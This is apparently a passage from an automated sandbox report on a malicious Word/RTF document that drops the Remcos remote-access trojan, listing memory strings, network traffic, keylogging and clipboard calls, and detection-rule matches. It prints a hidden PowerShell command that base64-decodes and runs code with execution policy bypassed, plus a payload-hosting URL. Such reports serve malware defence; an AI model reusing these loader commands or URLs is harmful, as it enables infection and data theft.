Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000011.00000002.420740850.0000000000719000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.892658708.0000000000459000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
Source: RegAsm.exe, 00000011.00000002.420401486.000000000033C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com/OK
Source: RegAsm.exe, 00000015.00000002.892591846.000000000020C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com/TK
Source: RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://www.msn.com/
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: RegAsm.exe, 0000000F.00000002.424444203.0000000000394000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net(
Source: RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: https://contextual.media.net/
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhv76C6.tmp.15.dr | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: powershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhv76C6.tmp.15.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: 9aubsm.url.0.drString found in binary or memory: https://og1.in/9aubsm
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                Source: powershell.exe, 0000000C.00000002.407271629.000000000253B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                Source: powershell.exe, 0000000C.00000002.407271629.000000000253B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                Source: RegAsm.exe, 0000000F.00000002.424846056.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.424860944.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.424852696.0000000002B60000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.894212797.0000000002DC0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.894186468.0000000002C70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.894177297.0000000002BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.420443541.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49161 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000 | 13_2_0040A2F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard | 13_2_0040B749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard | 13_2_004168FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard | 15_2_0040987A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard | 15_2_004098E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard | 16_2_00406DFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard | 16_2_00406E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard | 17_2_004068B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard | 17_2_004072B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard | 13_2_0040B749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx | 13_2_0040A41B
Source: Yara match | File source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR

E-Banking Fraud

Source: Yara match | File source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\nor\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041CA73 SystemParametersInfoW | 13_2_0041CA73

System Summary

Source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3916, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F971B2FE.doc, type: DROPPED | Matched rule: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].doc, type: DROPPED | Matched rule: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\9aubsm.url
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RN on 104.168.7.8.url
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process Stats: CPU usage > 49%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError | 13_2_0041812A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle | 13_2_0041330D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle | 13_2_0041BBC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle | 13_2_0041BB9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle | 15_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00401806 NtdllDefWindowProc_W | 15_2_00401806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004018C0 NtdllDefWindowProc_W | 15_2_004018C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_004016FD NtdllDefWindowProc_A | 16_2_004016FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_004017B7 NtdllDefWindowProc_A | 16_2_004017B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00402CAC NtdllDefWindowProc_A | 17_2_00402CAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00402D66 NtdllDefWindowProc_A | 17_2_00402D66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress | 13_2_004167EF
                Source: ~WRF{E867F054-9E2E-42CB-9DBD-A2E82224CF64}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 40 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                Source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
